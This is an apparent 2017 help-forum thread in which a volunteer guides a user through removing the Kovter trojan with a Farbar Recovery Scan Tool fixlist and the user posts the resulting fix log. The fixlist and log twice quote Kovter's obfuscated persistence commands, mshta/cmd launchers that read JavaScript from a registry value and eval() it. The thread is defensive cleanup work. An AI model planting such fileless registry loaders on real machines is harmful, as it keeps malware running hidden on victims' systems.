[preacherswife]

After rebooting, I can now access the Internet and things look pretty normal.  After nearly 24 hours, I finally feel somewhat relieved!  

[Advertisements]

Now we need to remove the malware. You have a Trojan called "Kovter" on the machine.

Download the enclosed => file.  fixlist.txt   1.39KB   129 downloads Save it in the location FRST64 is.C:\Users\Dorraine\Downloads Run FRST and click on the Fix button. Wait until finished.

The tool will make a log in the location FRST is, C:\Users\Dorraine\Downloads (Fixlog.txt). Please post it to your reply.

[zep516]

Now we need to remove the malware. You have a Trojan called "Kovter" on the machine.

Download the enclosed => file.  fixlist.txt   1.39KB   129 downloads Save it in the location FRST64 is.C:\Users\Dorraine\Downloads Run FRST and click on the Fix button. Wait until finished.

The tool will make a log in the location FRST is, C:\Users\Dorraine\Downloads (Fixlog.txt). Please post it to your reply.

[zep516]

If you need a break we can pick this up Tomorrow...

[preacherswife]

Joe, I'm a little confused on what you have asked me to do. 

 

Here is what I have...

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\czebe: cmd.exe /c start "" "C:\Users\Dorraine\AppData\Local\Unwe\axcevqyrif.ajpup" "javascript:Wa1KInMM="iDng20";e9e5=new ActiveXObject("WScript.Shell");hMpod7qY7="XF";lqho30=e9e5.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");tpAMDAG6="caqcRX";eval(lqho30);Yr9OkLi="L";" <==== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc: "C:\WINDOWS\system32\mshta.exe" "javascript:Cst0l="GA9B";P70r=new ActiveXObject("WScript.Shell");NPY7ss7="5t3";Ak1K2K=P70r.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");TCDQ8RjN="9YSa";eval(Ak1K2K);PAL0DE4S="A6skrsbh";" <==== ATTENTION
DeleteKey: HKCU\\software\\ppfkbxc
DeleteKey: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} =>  -> No File
Shortcut: C:\Users\Dorraine\AppData\Local\Alujen\usatoxuhi.lnk -> C:\Users\Dorraine\AppData\Local\Ygogud Ri\gni mwin.bat ()
C:\Users\Dorraine\AppData\Local\Ygogud Ri
AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:

[preacherswife]

Joe, if you have the time, I would rather continue until this is resolved.  I do not want to interfere with what you need to do or have to do.  If you need to leave, we can certainly pick this up again tomorrow.

[zep516]

In post 92 click FIXLIST, in the window check on save file and hit ok, let me know if you have the file on the desktop or it could be here C:\Users\Dorraine\Downloads

[preacherswife]

Under downloads, I have one that was added on 10/24 at 10:49 and the second one is named fixlist(1) which was added at 11:03.  That's the only thing I'm seeing.

[zep516]

Now open FRST64 and click fix

[preacherswife]

It's running now and said, it could take a few minutes.

[zep516]

It should be rather quick. It will create a log file called Fixlog.txt under downloads folder. Copy the log and paste it to a reply.

[zep516]

If you're having trouble delete 1 of the fixlists in the downloads folder, right click and delete. Then right click on FRST64 choose "Run as administrator" and click FIX. Post the Fixlog.txt.

[preacherswife]

Fix result of Farbar Recovery Scan Tool (x64) Version: 23-10-2017 01
Ran by Dorraine (24-10-2017 23:14:04) Run:6
Running from C:\Users\Dorraine\Downloads
Loaded Profiles: Dorraine (Available Profiles: Dorraine & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\czebe: cmd.exe /c start "" "C:\Users\Dorraine\AppData\Local\Unwe\axcevqyrif.ajpup" "javascript:Wa1KInMM="iDng20";e9e5=new ActiveXObject("WScript.Shell");hMpod7qY7="XF";lqho30=e9e5.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");tpAMDAG6="caqcRX";eval(lqho30);Yr9OkLi="L";" <==== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc: "C:\WINDOWS\system32\mshta.exe" "javascript:Cst0l="GA9B";P70r=new ActiveXObject("WScript.Shell");NPY7ss7="5t3";Ak1K2K=P70r.RegRead("HKCU\\software\\ppfkbxc\\ouvapr");TCDQ8RjN="9YSa";eval(Ak1K2K);PAL0DE4S="A6skrsbh";" <==== ATTENTION
DeleteKey: HKCU\\software\\ppfkbxc
DeleteKey: HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} =>  -> No File
Shortcut: C:\Users\Dorraine\AppData\Local\Alujen\usatoxuhi.lnk -> C:\Users\Dorraine\AppData\Local\Ygogud Ri\gni mwin.bat ()
C:\Users\Dorraine\AppData\Local\Ygogud Ri
AlternateDataStreams: C:\ProgramData\TEMP:5C321E34 [125]
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\czebe => key removed successfully
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc => key removed successfully
HKCU\\software\\ppfkbxc => key removed successfully
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\gakzyszyc => key not found.

========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========

HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\Gadgets => key removed successfully
HKLM\Software\Classes\CLSID\{6B9228DA-9C15-419e-856C-19E768A13BDC} => key not found.
C:\Users\Dorraine\AppData\Local\Alujen\usatoxuhi.lnk => moved successfully
C:\Users\Dorraine\AppData\Local\Ygogud Ri => moved successfully
C:\ProgramData\TEMP => ":5C321E34" ADS removed successfully.

========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= End of CMD: =========


========= netsh winsock reset catalog =========


Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========


========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8675328 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 64554766 B
Java, Flash, Steam htmlcache => 1649 B
Windows/system/drivers => 369910 B
Edge => 5758155 B
Chrome => 8577624 B
Firefox => 367283731 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 5962 B
NetworkService => 2206682 B
Dorraine => 75362577 B
DefaultAppPool => 0 B

RecycleBin => 24232372 B
EmptyTemp: => 531.2 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 23:29:30 ====

[preacherswife]

In case you are wondering, I did reboot my computer.  

[zep516]

Well done.

Please run adwCleaner once more. Right click and run as admin. Click scan. After scan is done click "Clean"

And that should do it. The Trojan was removed.

[preacherswife]

Joe, what can I do to prevent this from happening again?  Also, I am currently running the following programs...

 

Crypto Prevent

Malware Bytes which has expired

Spyware Blaster

Super Anti Spyware Free Edition

Windows Defender

 

What do I need to do about the Malware Bytes and do you think there is anything I need to add or delete?